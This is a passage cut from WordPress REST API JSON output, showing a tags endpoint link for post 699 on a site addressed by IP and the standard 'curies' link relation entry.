/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=699"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}